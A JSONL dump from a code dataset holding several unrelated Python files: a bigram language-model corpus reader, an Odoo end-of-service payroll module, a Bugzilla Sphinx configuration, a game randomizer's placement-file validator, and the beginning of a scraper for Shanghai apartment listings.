+{"seq_id":"17334559630","text":"import itertools\nimport string\nfrom urllib.request import urlopen\nfrom math import log2\n\nclass CorpusReader:\n \"\"\"\n Read an online corpus.\n \"\"\"\n\n VALID = {*string.ascii_lowercase, \".\", \",\", \":\", \"\\n\", \"#\", \"(\", \")\", \"!\", \"?\", \"\\'\", \"\\\"\", \" \"}\n\n @classmethod\n def sanitize(cls, message: str):\n \"\"\"\n Clean up undesired characters.\n \"\"\"\n res = []\n for char in message:\n if char in cls.VALID: # append valid char\n res.append(char)\n elif char in string.ascii_uppercase: # lowercase valid uppercase\n res.append(char.lower())\n\n return \"\".join(res).lower() # return string\n\n def __init__(self, url) -> None:\n \"\"\"\n Read the corpus.\n \"\"\"\n with urlopen(url) as result: # open a remote resource\n res = str(result.read())\n\n self.corpus = self.sanitize(res) # clean up result\n\n self.unigram_count = {char: 0 for char in self.VALID}\n\n for char in self.corpus: # count unigrams\n self.unigram_count[char] = self.unigram_count[char] + 1\n\n self.bigram_count = {bigram: 0 for bigram in itertools.product(self.VALID, repeat=2)}\n\n for pair in itertools.pairwise(self.corpus):\n self.bigram_count[pair] += 1 # count bigrams\n\nclass LanguageModel:\n def __init__(self, corpus: CorpusReader) -> None:\n self.corpus = corpus\n\n # compute n-gram frequencies\n self.unigrams = {key: (count + 1) / (len(self.corpus.corpus) + len(self.corpus.VALID)) for key, count in self.corpus.unigram_count.items()}\n self.bigrams = {(w1, w2): (self.corpus.bigram_count[(w2, w1)] + 1) / (self.corpus.unigram_count[w2] + len(self.corpus.VALID)) for (w1, w2) in self.corpus.bigram_count.keys()}\n \n # log2 frequencies\n self.log2unigrams = {w: log2(val) for w, val in self.unigrams.items()}\n self.log2bigrams = {(w1, w2): log2(val) for (w1, w2), val in self.bigrams.items()}","repo_name":"orchuk/SimAnnDecoder","sub_path":"language_model.py","file_name":"language_model.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24547506872","text":"# -*- coding: utf-8 -*-\nfrom dateutil.relativedelta import relativedelta\nfrom odoo import models, fields, api\n\n\nclass EndOfService(models.Model):\n _name = 'end_of.service'\n _inherit = ['mail.thread', 'mail.activity.mixin']\n _rec_name = 'employee_id'\n\n date = fields.Date(string=\"Date\",\n required=False,\n default=fields.Date.context_today)\n employee_id = fields.Many2one(comodel_name=\"hr.employee\", string=\"Employee Name\", required=False, )\n job_position_id = fields.Many2one(comodel_name=\"hr.job\", string=\"Job Position\", required=False, )\n employee_number = fields.Char(string=\"Employee Number\", required=False, )\n start_training_date = fields.Date(string=\"Start Training Date\", required=False)\n end_training_date = fields.Date(string=\"End Training Date\", required=False)\n training_period = fields.Char(string=\"Training Period\", required=False,\n compute='get_training_period', default='')\n working_years = fields.Char(string=\"Working Years\", required=False,\n compute='get_working_years', store=True)\n date_of_hiring_date = fields.Date(string=\"Date of Hiring\", required=False)\n end_of_service_date = fields.Date(string=\"Date End of Service\", required=False)\n basic_salary = fields.Float(string=\"Basic Salary\", required=False, )\n comprehensive_wage = fields.Float(string=\"Wage\", required=False, )\n\n reason = fields.Many2one(comodel_name=\"reasons.end_of.service\", string=\"Reason\", required=False, )\n\n financial_dues_ids = fields.One2many(comodel_name=\"financial.dues\",\n inverse_name=\"end_of_service_id\", string=\"\", required=False, )\n\n pay_for_working_days = fields.Float(string=\"Pay For Working Days\", required=False, )\n month_of_warning = fields.Float(string=\"Month of Warning\", required=False, )\n leave_entitlement = fields.Float(string=\"Leave Entitlement\", required=False, )\n leave_transportation_allowance = fields.Float(string=\"Leave Transportation Allowance\", required=False, )\n end_of_service_gratuity = fields.Float(string=\"End of Service Gratuity\", required=False, )\n extra_pay = fields.Float(string=\"Extra Pay\", required=False, )\n grants_and_incentives = fields.Float(string=\"Grants & Incentives\", required=False, )\n other = fields.Float(string=\"Other\", required=False, )\n compensation = fields.Float(string=\"Compensation(Basic * 6 months)\", required=False, )\n\n month_of_warning_deduction = fields.Float(string=\"Month Of Warning\", required=False, )\n absence_deduction = fields.Float(string=\"Absence\", required=False, )\n loan_deduction = fields.Float(string=\"Loans\", required=False, )\n work_days_paid_with_salary_deduction = fields.Float(string=\"Work days paid with salary\", required=False, )\n violations_and_fines_deduction = fields.Float(string=\"Violations and fines\", required=False, )\n grants_and_incentives_deduction = fields.Float(string=\"Grants and incentives\", required=False, )\n total_deduction = fields.Float(string=\"Total Deduction\", required=False,compute='sum_total_deduction' )\n\n # Check Invisible\n pay_for_working_days_boolean = fields.Boolean(string=\"Pay For Working Days\", required=False\n , related='reason.pay_for_working_days')\n month_of_warning_boolean = fields.Boolean(string=\"Month of Warning\", required=False,\n related='reason.month_of_warning')\n leave_entitlement_boolean = fields.Boolean(string=\"Leave Entitlement\", required=False,\n related='reason.leave_entitlement')\n leave_transportation_allowance_boolean = fields.Boolean(string=\"Leave Transportation 
Allowance\",\n related='reason.leave_transportation_allowance',\n required=False, )\n end_of_service_gratuity_boolean = fields.Boolean(string=\"End of Service Gratuity\",\n related='reason.end_of_service_gratuity',\n required=False, )\n extra_pay_boolean = fields.Boolean(string=\"Extra Pay\", required=False,\n related='reason.extra_pay')\n grants_and_incentives_boolean = fields.Boolean(string=\"Grants & Incentives\",\n related='reason.grants_and_incentives',\n required=False, )\n other_boolean = fields.Boolean(string=\"Other\", required=False,\n related='reason.other')\n compensation_boolean = fields.Boolean(string=\"compensation(Basic * 6 months)\", required=False,\n related='reason.compensation'\n )\n\n total_benefits = fields.Float(string=\"Total Benefits\", required=False, readonly=True)\n state = fields.Selection([\n ('draft', 'Draft'),\n ('hr_approve', 'HR Officer Approve'),\n ('hr_manager','HR Manager Approve'),\n ('secretary','Secretary Genral'),\n ('cancel', 'Cancel'),\n ('finance', 'Finance')], string='Status', index=True, readonly=True, default='draft',\n track_visibility='onchange', copy=False)\n finance_approve_id=fields.Many2one('payment.request',readonly=True)\n paid_amount=fields.Float(string='Net Paid Amount',compute='net_amount',store=True)\n donor = fields.Many2one('res.partner', string='Donor', required=True)\n project = fields.Many2one('account.analytic.account', string='Project', domain=\"[('type','=','project')]\")\n account = fields.Many2one('account.account', string='Account',required=True)\n activity = fields.Many2one('account.analytic.account', 'Activity',\n domain=\"[('type','=','activity')]\")\n\n @api.depends('total_benefits', 'total_deduction')\n def sum_total_deduction(self):\n for rec in self:\n rec.total_deduction=rec.month_of_warning+rec.loan_deduction+rec.violations_and_fines_deduction+rec.absence_deduction +\\\n rec.work_days_paid_with_salary_deduction + rec.grants_and_incentives_deduction\n\n @api.depends('total_benefits','total_deduction')\n def net_amount(self):\n for rec in self:\n rec.paid_amount=rec.total_benefits - rec.total_deduction\n\n def to_hr(self):\n self.write({'state': 'hr_approve'})\n\n def to_hr_manager(self):\n self.write({'state': 'hr_manager'})\n\n def to_secretary(self):\n self.write({'state': 'secretary'})\n\n def action_cancel(self):\n self.write({'state': 'cancel'})\n\n def action_done(self):\n self.write({'state': 'finance'})\n payment_request_vals = {\n 'payment_method': 'cash',\n 'user_id': self.env.user.partner_id.id,\n 'reason': self.reason\n }\n finance_approve_id = self.env['payment.request'].create(payment_request_vals)\n payment_request_lines_vals = {\n 'payment_request_id':finance_approve_id.id,\n 'account_id': self.account.id,\n 'donor_id': self.donor.id,\n 'project_id': self.project.id,\n 'analytic_activity_id': self.activity.id,\n 'request_amount':self.paid_amount,\n\n }\n self.env['payment.request.lines'].create(payment_request_lines_vals)\n self.finance_approve_id = finance_approve_id\n\n @api.onchange('employee_id')\n def get_employee_data(self):\n for rec in self:\n rec.job_position_id = rec.employee_id.job_id.id\n rec.comprehensive_wage = rec.employee_id.contract_id.wage\n # rec.basic_salary = rec.employee_id.pin\n rec.basic_salary = rec.comprehensive_wage * 60 / 100\n\n @api.depends('start_training_date', 'end_training_date')\n def get_training_period(self):\n for rec in self:\n if rec.start_training_date or rec.end_training_date:\n days = relativedelta(rec.end_training_date, rec.start_training_date).days\n 
months = relativedelta(rec.end_training_date, rec.start_training_date).months\n years = relativedelta(rec.end_training_date, rec.start_training_date).years\n rec.training_period = \" Years: \" + str(years) + \" Months : \" + str(months) + \" Days : \" + str(days)\n else:\n rec.training_period = \"\"\n\n @api.depends('employee_id', 'end_of_service_date')\n def get_working_years(self):\n for rec in self:\n if rec.employee_id:\n\n # contract = self.env['hr.contract'].search([\n # ('employee_id', '=', rec.employee_id.id),\n # ('state', '=', 'open')\n # ])\n\n rec.date_of_hiring_date = rec.employee_id.contract_id.date_start\n if rec.employee_id.contract_id.date_end:\n rec.end_of_service_date = rec.employee_id.contract_id.date_end\n res = self.env['indemnity.config.line'].search([])\n days = relativedelta(rec.end_of_service_date, rec.date_of_hiring_date).days\n months = relativedelta(rec.end_of_service_date, rec.date_of_hiring_date).months\n years = relativedelta(rec.end_of_service_date, rec.date_of_hiring_date).years\n\n rec.working_years = \" Years: \" + str(years) + \" Months : \" + str(months) + \" Days : \" + str(days)\n else:\n rec.working_years = ''\n\n # print('------------res', res)\n # print('------------days', days)\n # for line in res:\n\n # @api.onchange('reason')\n # def create_FinancialDues(self):\n # for rec in self:\n # if rec.reason:\n # res = self.env['reasons.end_of.service'].search([('reason', '=', rec.reason)],limit=1)\n # if res:\n # for reason in res:\n # if reason.pay_for_working_days:\n # rec.pay_for_working_days_boolean = True\n # else:\n # rec.pay_for_working_days_boolean = False\n #\n # if reason.month_of_warning:\n # rec.month_of_warning_boolean = True\n # else:\n # rec.month_of_warning_boolean = False\n #\n # if reason.leave_entitlement:\n # rec.leave_entitlement_boolean = True\n # else:\n # rec.leave_entitlement_boolean = False\n #\n # if reason.leave_transportation_allowance:\n # rec.leave_transportation_allowance_boolean = True\n # else:\n # rec.leave_transportation_allowance_boolean = False\n #\n # if reason.end_of_service_gratuity:\n # rec.end_of_service_gratuity_boolean = True\n # else:\n # rec.end_of_service_gratuity_boolean = False\n #\n # if reason.extra_pay:\n # rec.extra_pay_boolean = True\n # else:\n # rec.extra_pay_boolean = False\n #\n # if reason.grants_and_incentives:\n # rec.grants_and_incentives_boolean = True\n # else:\n # rec.grants_and_incentives_boolean = False\n #\n # if reason.other:\n # rec.other_boolean = True\n # else:\n # rec.other_boolean = False\n #\n # if reason.compensation:\n # rec.compensation_boolean = True\n # else:\n # rec.compensation_boolean = False\n\n def action_compute(self):\n for rec in self:\n\n years = relativedelta(rec.end_of_service_date, rec.date_of_hiring_date).years\n if rec.employee_id:\n total_benefits = 0.0\n res_payslip = self.env['hr.payslip'].search([\n ('employee_id', '=', rec.employee_id.id),\n ('state', 'not in', ['done', 'paid']),\n ], order='date_to desc', limit=1)\n print('----------res_payslip', res_payslip)\n if res_payslip:\n rec.pay_for_working_days = res_payslip.net_wage\n rec.compensation = rec.basic_salary * 6\n res_config = self.env['indemnity.config'].search([], order='date desc',\n limit=1)\n for line in res_config.indemnity_config_ids:\n if years >= line.from_year and years <= line.to_year:\n if line.month_count == '1':\n rec.end_of_service_gratuity = 1 * rec.basic_salary * years\n if line.month_count == '2':\n rec.end_of_service_gratuity = 1.5 * rec.basic_salary * years\n\n if 
line.month_count == '3':\n rec.end_of_service_gratuity = 2 * rec.basic_salary * years\n\n if line.month_count == '4':\n rec.end_of_service_gratuity = 2.5 * rec.basic_salary * years\n\n if line.month_count == '5':\n rec.end_of_service_gratuity = 3 * rec.basic_salary * years\n\n rec.leave_transportation_allowance = (rec.comprehensive_wage / 30) * rec.employee_id.remaining_leaves\n total_benefits = rec.pay_for_working_days + rec.month_of_warning + rec.leave_entitlement + rec.leave_transportation_allowance + rec.end_of_service_gratuity + rec.extra_pay + rec.grants_and_incentives + rec.other + rec.compensation\n rec.total_benefits = total_benefits\n\n # print('------------res', res_config)\n\n\nclass FinancialDues(models.Model):\n _name = 'financial.dues'\n\n name = fields.Char(string=\"Name\", required=False, )\n amount = fields.Float(string=\"Amount\", required=False, )\n note = fields.Text(string=\"Note\", required=False, )\n\n end_of_service_id = fields.Many2one(comodel_name=\"end_of.service\", string=\"\", required=False, )\n","repo_name":"nusyba111/tad","sub_path":"hr_end_of_service_srcs/models/end_of_service.py","file_name":"end_of_service.py","file_ext":"py","file_size_in_byte":14601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
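The gratuity tiers hard-coded in action_compute above map an indemnity month_count code to a salary multiplier. A minimal standalone restatement of that mapping, assuming the same codes and multipliers as the compute (the function name and sample figures are illustrative, not part of the module):

# Hypothetical re-statement of the end-of-service gratuity rule from action_compute:
# each configured month_count code pays a multiple of the basic salary per year of service.
MULTIPLIER_BY_CODE = {'1': 1.0, '2': 1.5, '3': 2.0, '4': 2.5, '5': 3.0}

def gratuity(basic_salary, years, month_count_code):
    # Codes outside the configured tiers contribute nothing.
    return MULTIPLIER_BY_CODE.get(month_count_code, 0.0) * basic_salary * years

print(gratuity(3000.0, 4, '2'))  # 1.5 * 3000.0 * 4 = 18000.0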
+{"seq_id":"11365331266","text":"# -*- coding: utf-8 -*-\n#\n# Bugzilla documentation build configuration file, created by\n# sphinx-quickstart on Tue Sep 3 16:11:00 2013.\n#\n# This file is execfile()d with the current directory set to its containing dir.\n#\n# Note that not all possible configuration values are present in this\n# autogenerated file.\n#\n# All configuration values have a default; values that are commented out\n# serve to show the default.\n\nimport sys, os, re\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#sys.path.insert(0, os.path.abspath('.'))\n\n# -- General configuration -----------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\nneeds_sphinx = '1.0'\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['sphinx.ext.todo', 'sphinx.ext.extlinks']\n\nif tags.has('enable_rst2pdf'):\n extensions.append('rst2pdf.pdfbuilder')\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'Bugzilla'\ncopyright = u'2016, The Bugzilla Team'\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = 'Unknown'\n# The full version, including alpha/beta/rc tags.\nrelease = 'Unknown'\n\nfor line in open(\"../../../Bugzilla/Constants.pm\"):\n match = re.search(r'BUGZILLA_VERSION\\s+=>\\s+\"([^\"]+)\"', line)\n if (match):\n release = match.group(1)\n match = re.search(r'^\\d+\\.\\d+', release)\n if (match):\n version = match.group(0)\n else:\n version = release\n break\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#language = None\n\n# There are two options for replacing |today|: either, you set today to some\n# non-false value, then it is used:\n#today = ''\n# Else, today_fmt is used as the format for a strftime call.\n#today_fmt = '%B %d, %Y'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['**.inc.rst']\n\n# The reST default role (used for this markup: `text`) to use for all documents.\n#default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n#add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\n#add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n#show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# A list of ignored prefixes for module index sorting.\n#modindex_common_prefix = []\n\nrst_prolog = \"\"\"\n.. role:: param\n :class: param\n\n.. role:: paramval\n :class: paramval\n\n.. role:: group\n :class: group\n\n.. 
role:: field\n :class: field\n\n.. |min-perl-ver| replace:: 5.10.1\n\"\"\"\n\nrst_epilog = \"\"\"\n\n----------\n\nThis documentation undoubtedly has bugs; if you find some, please file\nthem `here `_.\n\"\"\"\n\n# -- Options for HTML output ---------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'default'\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#html_theme_options = {}\n\n# Add any paths that contain custom themes here, relative to this directory.\n#html_theme_path = []\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n#html_title = None\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\nhtml_style = \"bugzilla.css\"\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\nhtml_logo = \"../images/bugzilla.png\"\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\nhtml_favicon = '../../../images/favicon.ico'\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\n#html_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n# Switched off because it converted --long-option to –long-option\nhtml_use_smartypants = False\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\nhtml_use_index = False\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\nhtml_show_sourcelink = False\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\n#html_show_sphinx = True\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. Default is True.\nhtml_show_copyright = False\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'Bugzilladoc'\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n# The paper size ('letterpaper' or 'a4paper').\n#'papersize': 'letterpaper',\n\n# The font size ('10pt', '11pt' or '12pt').\n#'pointsize': '10pt',\n\n# Additional stuff for the LaTeX preamble.\n#'preamble': '',\n}\n\n# Grouping the document tree into LaTeX files. 
List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [\n ('index', 'Bugzilla.tex', u'Bugzilla Documentation',\n u'The Bugzilla Team', 'manual'),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'bugzilla', u'Bugzilla Documentation',\n [u'The Bugzilla Team'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n\n# -- Options for Texinfo output ------------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n ('index', 'Bugzilla', u'Bugzilla Documentation',\n u'The Bugzilla Team', 'Bugzilla', 'One line description of project.',\n 'Miscellaneous'),\n]\n\n# Documents to append as an appendix to all manuals.\n#texinfo_appendices = []\n\n# If false, no module index is generated.\n#texinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n#texinfo_show_urls = 'footnote'\n\n# -- Options for PDF output --------------------------------------------------\n\n# Grouping the document tree into PDF files. List of tuples\n# (source start file, target name, title, author, options).\n#\n# If there is more than one author, separate them with \\\\.\n# For example: r'Guido van Rossum\\\\Fred L. Drake, Jr., editor'\n#\n# The options element is a dictionary that lets you override\n# this config per-document.\n# For example,\n# ('index', u'MyProject', u'My Project', u'Author Name',\n# dict(pdf_compressed = True))\n# would mean that specific document would be compressed\n# regardless of the global pdf_compressed setting.\n\npdf_documents = [\n('index', u'Bugzilla', u'Bugzilla Documentation', u'The Bugzilla Team'),\n]\n\n# A comma-separated list of custom stylesheets. Example:\npdf_stylesheets = ['sphinx','kerning','a4']\n\n# A list of folders to search for stylesheets. Example:\npdf_style_path = ['.', '_styles']\n\n# Create a compressed PDF\n# Use True/False or 1/0\n# Example: compressed=True\npdf_compressed = True\n\n# A colon-separated list of folders to search for fonts. Example:\n# pdf_font_path = ['/usr/share/fonts', '/usr/share/texmf-dist/fonts/']\n\n# Language to be used for hyphenation support\n#pdf_language = \"en_US\"\n\n# Mode for literal blocks wider than the frame. 
Can be\n# overflow, shrink or truncate\npdf_fit_mode = \"shrink\"\n\n# Section level that forces a break page.\n# For example: 1 means top-level sections start in a new page\n# 0 means disabled\npdf_break_level = 2\n\n# When a section starts in a new page, force it to be 'even', 'odd',\n# or just use 'any'\n#pdf_breakside = 'any'\n\n# Insert footnotes where they are defined instead of\n# at the end.\n#pdf_inline_footnotes = True\n\n# verbosity level. 0 1 or 2\npdf_verbosity = 0\n\n# If false, no index is generated.\npdf_use_index = False\n\n# If false, no modindex is generated.\npdf_use_modindex = False\n\n# If false, no coverpage is generated.\n#pdf_use_coverpage = True\n\n# Name of the cover page template to use\n#pdf_cover_template = 'sphinxcover.tmpl'\n\n# Documents to append as an appendix to all manuals.\n#pdf_appendices = []\n\n# Enable experimental feature to split table cells. Use it\n# if you get \"DelayedTable too big\" errors\n#pdf_splittables = False\n\n# Set the default DPI for images\n#pdf_default_dpi = 72\n\n# Enable rst2pdf extension modules (default is only vectorpdf)\n# you need vectorpdf if you want to use sphinx's graphviz support\npdf_extensions = ['vectorpdf', 'dotted_toc']\n\n# Page template name for \"regular\" pages\n#pdf_page_template = 'cutePage'\n\n# Show Table Of Contents at the beginning?\npdf_use_toc = True\n\n# How many levels deep should the table of contents be?\npdf_toc_depth = 5\n\n# Add section number to section references\npdf_use_numbered_links = True\n\n# Background images fitting mode\npdf_fit_background_mode = 'scale'\n\n# -- Options for Sphinx extensions -------------------------------------------\n\n# Temporary highlighting of TODO items\ntodo_include_todos = False\n\n# The readthedocs.org website cannot access POD.\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\n\nif on_rtd:\n base_api_url = 'https://www.bugzilla.org/docs/5.0/en/html/integrating/api/'\nelse:\n base_api_url = '../integrating/api/'\n\nextlinks = {'bug': ('https://bugzilla.mozilla.org/show_bug.cgi?id=%s', 'bug '),\n 'api': (base_api_url + '%s', '')}\n","repo_name":"WebKit/WebKit","sub_path":"Websites/bugs.webkit.org/docs/en/rst/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":12073,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"}
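The version detection above hinges on two regular expressions run over Bugzilla/Constants.pm. A self-contained check of that logic against a sample line (the constant's value here is invented for illustration):

import re

line = 'use constant BUGZILLA_VERSION => "5.0.4";'  # hypothetical Constants.pm line
release = 'Unknown'
match = re.search(r'BUGZILLA_VERSION\s+=>\s+"([^"]+)"', line)
if match:
    release = match.group(1)
    # The short X.Y version is the leading digits-dot-digits prefix, if present.
    short = re.search(r'^\d+\.\d+', release)
    version = short.group(0) if short else release
print(release, version)  # 5.0.4 5.0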
+{"seq_id":"36807292167","text":"from .constants import *\nfrom options import Options\nfrom version import VERSION\n\nimport json\n\n\nclass InvalidPlacementFile(Exception):\n pass\n\n\nclass PlacementFile:\n def __init__(self):\n self.version = \"\"\n self.options = Options()\n self.hash_str = \"\"\n self.starting_items = []\n self.required_dungeons = []\n self.item_locations = {}\n self.chest_dowsing = {}\n self.hints = {}\n self.dungeon_connections = {}\n self.trial_connections = {}\n self.trial_object_seed = -1\n self.music_rando_seed = -1\n self.bk_angle_seed = -1\n\n def read_from_file(self, f):\n self._read_from_json(json.load(f))\n\n def read_from_str(self, s):\n self._read_from_json(json.loads(s))\n\n def to_json_str(self):\n retval = {\n \"version\": self.version,\n \"permalink\": self.options.get_permalink(exclude_seed=True),\n \"hash\": self.hash_str,\n \"starting-items\": self.starting_items,\n \"required-dungeons\": self.required_dungeons,\n \"item-locations\": self.item_locations,\n \"chest-dowsing\": self.chest_dowsing,\n \"hints\": self.hints,\n \"entrance-connections\": self.dungeon_connections,\n \"trial-connections\": self.trial_connections,\n \"trial-object-seed\": self.trial_object_seed,\n \"music-rando-seed\": self.music_rando_seed,\n \"bk-angle-seed\": self.bk_angle_seed,\n }\n return json.dumps(retval, indent=2)\n\n def _read_from_json(self, jsn):\n self.version = jsn[\"version\"]\n self.options.update_from_permalink(jsn[\"permalink\"])\n self.options.set_option(\"seed\", -1)\n self.hash_str = jsn[\"hash\"]\n self.starting_items = jsn[\"starting-items\"]\n self.required_dungeons = jsn[\"required-dungeons\"]\n self.item_locations = jsn[\"item-locations\"]\n self.chest_dowsing = jsn[\"chest-dowsing\"]\n self.hints = jsn[\"hints\"]\n self.dungeon_connections = jsn[\"entrance-connections\"]\n self.trial_connections = jsn[\"trial-connections\"]\n self.trial_object_seed = jsn[\"trial-object-seed\"]\n self.music_rando_seed = jsn[\"music-rando-seed\"]\n self.bk_angle_seed = jsn[\"bk-angle-seed\"]\n\n def check_valid(self, areas):\n \"\"\"checks, if the current state is valid, throws an exception otherwise\n This does not check consistency with all the settings\"\"\"\n if VERSION != self.version:\n raise InvalidPlacementFile(\n f\"Version did not match, requires {self.version} but found {VERSION}.\"\n )\n\n for item in self.starting_items:\n if item not in ALLOWED_STARTING_ITEMS:\n raise InvalidPlacementFile(f\"Invalid starting item {item}.\")\n\n for req_dungeon in self.required_dungeons:\n if req_dungeon not in REGULAR_DUNGEONS:\n raise InvalidPlacementFile(\n f\"{req_dungeon} is not a valid required dungeon.\"\n )\n\n if sorted(self.dungeon_connections.keys()) != sorted(\n DUNGEON_OVERWORLD_ENTRANCES.values()\n ):\n raise InvalidPlacementFile(\"Dungeon dungeon_connections are wrong.\")\n\n if sorted(self.dungeon_connections.values()) != sorted(\n DUNGEON_OVERWORLD_ENTRANCES.keys()\n ):\n raise InvalidPlacementFile(\"Dungeon entries are wrong.\")\n\n if sorted(self.trial_connections.keys()) != sorted(SILENT_REALM_GATES.values()):\n raise InvalidPlacementFile(\"Trial trial_connections are wrong.\")\n\n if sorted(self.trial_connections.values()) != sorted(SILENT_REALM_GATES.keys()):\n raise InvalidPlacementFile(\"Trial entries are wrong.\")\n\n for item in self.item_locations.values():\n if item not in ALL_ITEM_NAMES:\n raise InvalidPlacementFile(f'Invalid item \"{item}\".')\n\n check_sets_equal(\n set(areas.checks.keys()),\n set(self.item_locations.keys()),\n 
\"Checks\",\n )\n\n check_sets_equal(\n {FI_HINTS_KEY} | set(areas.gossip_stones.keys()) | set(SONG_HINTS),\n set(self.hints.keys()),\n \"Gossip Stone Hints\",\n )\n\n for hintlist in self.hints.values():\n if not isinstance(hintlist, list):\n raise InvalidPlacementFile(\n \"Gossip stone hints need to be LISTS of strings.\"\n )\n for hint in hintlist:\n if not isinstance(hint, str):\n raise InvalidPlacementFile(\n \"Gossip stone hints need to be lists of STRINGS.\"\n )\n\n\ndef check_sets_equal(orig: set, actual: set, name: str):\n if orig != actual:\n additional = actual - orig\n missing = orig - actual\n error_msg = \"\"\n if additional:\n error_msg += f\"Additional {name}:\\n\"\n error_msg += \", \".join(additional) + \"\\n\"\n if missing:\n error_msg += f\"Missing {name}:\\n\"\n error_msg += \", \".join(missing) + \"\\n\"\n raise InvalidPlacementFile(error_msg)\n","repo_name":"ssrando/ssrando","sub_path":"logic/placement_file.py","file_name":"placement_file.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"3"}
+{"seq_id":"34760051522","text":"import numpy as np\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nbaseurl = 'https://www.smartshanghai.com/housing/apartments-rent'\nhouse_data = pd.read_csv(\"housing_data_full.csv\",low_memory=False)\n\ndef get_data(a,b):\n contents = []\n for page in range(a,b):\n\n params = {'page': page}\n response = requests.get(baseurl,params)\n if response.status_code == 200:\n soup = BeautifulSoup(response.content, \"html.parser\")\n contents.append(soup.find_all(\"div\", class_ = 'cont'))\n\n else:\n print(response.status_code)\n return contents\n\ndef extract_data(contents):\n\n Listing_Id = []\n District = []\n Price = []\n Size = []\n N_Bedrooms = []\n N_Bathrooms = []\n\n for content in contents:\n for i in range(len(content)):\n Listing_Id.append(content[i].find('div').attrs['data-listingid'])\n\n apts = content[i].find('div', class_ = 'body')\n price = apts.find('div', class_ = 'price').text.strip().split()[1].split(',')\n Price.append(price[0]+price[1])\n\n info = re.findall('\\d+', apts.find('div', class_ = 'room-type').text.strip())\n Size.append(info[0])\n N_Bedrooms.append(info[1])\n N_Bathrooms.append(info[2])\n\n df = pd.DataFrame(np.column_stack([Listing_Id,Price,Size,N_Bedrooms,N_Bathrooms]),\n columns=['Listing_Id','Price','Size','N_Bedrooms', 'N_Bathrooms'])\n\n return df\n #return pd.concat((house_data, df), ignore_index=True)\n\n\ndef page_data(data):\n\n features = ['Type', 'Available From', 'Agency Commission', 'Rooms', 'Size',\n 'Floor', 'Furnished', 'Main Window Facing', 'District', 'Area',\n 'Compound', 